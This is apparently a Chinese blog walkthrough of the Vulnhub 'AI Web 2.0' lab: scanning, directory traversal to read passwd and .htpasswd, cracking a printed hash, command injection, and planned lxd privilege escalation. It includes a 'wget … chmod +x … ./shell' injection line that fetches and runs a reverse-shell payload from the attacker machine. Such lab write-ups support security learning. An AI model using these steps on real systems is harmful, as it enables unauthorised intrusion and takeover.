AI Web 2.0
kali: 192.168.0.103
目标机:192.168.0.105
0X01 扫描端口和目录
a)扫描端口
开启了80和22端口
b)扫描目录
看到两个敏感字样的目录
尝试访问/webadmin 目录,没有账号密码进不去
另一个也被禁止访问
c)深度扫描目录
dirb http://192.168.0.105 -X .txt,.html,.php,.zip
看到有个download文件,但是下载后是个空文件
0X02 查看80端口的网页结构,获取有效信息
是一个不需要密码的登陆界面,尝试admin登陆没用,注册一个账号登陆进去
暴露了这是一个文件共享的系统
Google搜索此系统
得到两个漏洞
一个目录遍历
一个跨站请求伪造
0X03 使用目录遍历
有两个文件可以目录遍历,尝试任选一个包含passwd文件成功
0X04 爆破ssh
通过passwd我们可以看到用户名是aiweb2
尝试进行爆破ssh登陆
并没有获得密码
0X05 查看配置文件和日志文件,尝试包含日志
得到一个apache配置文件,没得到什么信息
读取apache和ssh日志,都失败,可能没有权限读取
后来查看别人的文章才知道,思路是对的,但是文件没找到,读取/etc/apache2/.htpasswd文件,为什么会想到查看这个文件,后面我理解了,因为之前我们扫到了webadmin的目录,网站后台登陆
读取/etc/apache2/.htpasswd文件得到一串密码aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
使用john破解hash,将密码粘贴到test.txt中
john --wordlist='/usr/share/wordlists/rockyou.txt' test.txt john --show test.txt
rockyou.txt是收集的已泄露密码文件
0X06 进入网站后台
暗示我们查看robots文件
查看两个目录,第一个是ping命令,联想到命令执行漏洞
第二个目录,翻译:在此目录中找到多汁的信息!!!
使用dirb 搜索目录,什么也没找到
0X07 利用第一个目录
a)查看是否有命令执行漏洞
b)命令执行漏洞存在,使用漏洞获得shell
使用命令执行下载大马上去,密码正确进不去
下载msf生成的php文件,访问上线后立马挂掉
写了个一句话木马进去,也连不上,也不知道为什么
最后用msf的linux/x86/meterpreter/reverse_tcp这个payload反弹成功,制作过程不演示,
|| wget http://192.168.0.103/shell || chmod +x shell || ./shell
0X08 提权
a) 查看当前网站目录下是否还有遗漏的重要信息
在另一个目录下发现隐藏文件,查看内容记录着ssh的账号密码
b) 登陆ssh
uname -an 查看内核信息 不优先使用内核提权
id 查看当前用户权限 发现lxd
LXD:Linux的下一代容器管理器
谷歌搜索相关漏洞: lxd exploit
查到一条相关漏洞,版本要求Ubuntu18.04
cat /etc/issue
查看当前版本,可以利用
下载exp并查看是使用说明
AI Web 2.0的更多相关文章
- AI Web 1.0
kali:192.168.0.103 目标机:192.168.0.105 0X01 端口和目录扫描 打开目标主页没有任何信息 a) 端口扫描 只有一个80端口开启 b) 目录扫描 0x03 查看敏感目 ...
- AI:WEB:1 Walkthrough
AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法: Nmap网络扫描 浏 ...
- 语义网 (Semantic Web)和 web 3.0
语义网=有意义的网络. "如果说 HTML 和 WEB 将整个在线文档变成了一本巨大的书,那么 RDF, schema, 和 inference languages 将会使世界上所有的数据变 ...
- 说说web 2.0生态圈的那些事
先来说一道面试题吧,“说一下,web 2.0 和web 1.0的区别?” 官方的解释是这样的: Web1.0 的主要特点在于用户通过浏览器获取信息,Web2.0 则更注重用户的交互作用,用户既是网站内 ...
- 基于Server-Sent Event的简单聊天室 Web 2.0时代,即时通信已经成为必不可少的网站功能,那实现Web即时通信的机制有哪些呢?在这门项目课中我们将一一介绍。最后我们将会实现一个基于Server-Sent Event和Flask简单的在线聊天室。
基于Server-Sent Event的简单聊天室 Web 2.0时代,即时通信已经成为必不可少的网站功能,那实现Web即时通信的机制有哪些呢?在这门项目课中我们将一一介绍.最后我们将会实现一个基于S ...
- asp.net web api2.0 ajax跨域解决方案
asp.net web api2.0 ajax跨域解决方案 Web Api的优缺点就不说了,直接说怎么跨域,我搜了一下,主要是有两种. 一,ASP.NET Web API支持JSONP,分两种 1, ...
- 关于web.xml3.0启动报错
九月 08, 2017 10:18:19 上午 org.apache.tomcat.util.digester.SetPropertiesRule begin 警告: [SetPropertiesRu ...
- O'Reilly总裁提姆-奥莱理:什么是Web 2.0
O'Reilly总裁提姆-奥莱理:什么是Web 2.0 译者序:Web 2.0这一概念,由O'Reilly媒体公司总裁兼CEO提姆·奥莱理提出.他是美国IT业界公认的传奇式人物,是“开放源码”概念的缔 ...
- Web 2.0应用客户端性能问题十大根源《转载》
前言 Web 2.0应用的推广为用户带来了全新的体验,同时也让开发人员更加关注客户端性能问题.最近,资深Web性能诊断专家.知名工具dynatrace的创始人之一Andreas Grabner根据自己 ...
随机推荐
- GPU与CPU
GPU与CPU CPU CPU,也就是中央处理器,结构主要包括控制器(指挥各部分工作).运算器(实现数据加工).寄存器.高缓以及数据/控制/状态总线.计算机的性能很大程度上依赖于CPU,CPU的功能包 ...
- node--->PHPStorm 停留在 Scanning files to index..
使用webpack时,敲了npm 一些命令后,PHPStorm 开始 Scanning files to index...,去建立文件索引,但是如果一直停留在这个状态,说明是npm install 后 ...
- Git详解之基础使用
前言 读完本章你就能上手使用 Git 了.本章将介绍几个最基本的,也是最常用的 Git 命令,以后绝大多数时间里用到的也就是这几个命令.读完本章,你就能初始化一个新的代码仓库,做一些适当配置:开始或停 ...
- java编写杨辉三角
import java.util.Scanner; /* *计算杨辉三角: * 规律:两边都是1 * 从第三行开始,上一行的前一个元素+与其并排的元素等于下面的元素 * 例如: * 1 * 11 * ...
- Linux后门的几种姿势
转载自 https://evilanne.github.io/2017/08/26/Linux%E5%90%8E%E9%97%A8-%E6%8C%81%E7%BB%AD%E5%85%B3%E6%B3% ...
- Linux磁盘管理及挂载
1.在vm workstations添加磁盘 添加完之后重启一下虚拟机 然后fdisk -l 可以看到虚拟机已经识别到了新的磁盘 2.添加磁盘分区 输入命令 fdisk /dev/sdb 命令(输入 ...
- selenium控制浏览器操作
selenium控制浏览器操作 控制浏览器有哪些操作? 控制页面大小 前进.后退 刷新 自动输入.提交 ........ 控制页面大小,实例: # -*- coding:utf-8 -*- from ...
- Tomcat安装教程及常见错误解决方法
目录 Tomcat安装教程及常见错误解决方法 一.安装前准备 ·熟悉自己电脑的操作系统版本(32位or64位) ·保证电脑上已经装好JDK,并且已经设置好环境变量. 二.Tomcat安装教程(以Tom ...
- Django 搭建
1.安装python 2.pip 安装 Django 2.1.3 是版本号 命令:pip install Django==2.1.3 3.数据库驱动: mysql 数据库配置文档: 下载 whl 文 ...
- NR / 5G - Uplink Carrier Waveform Generation





















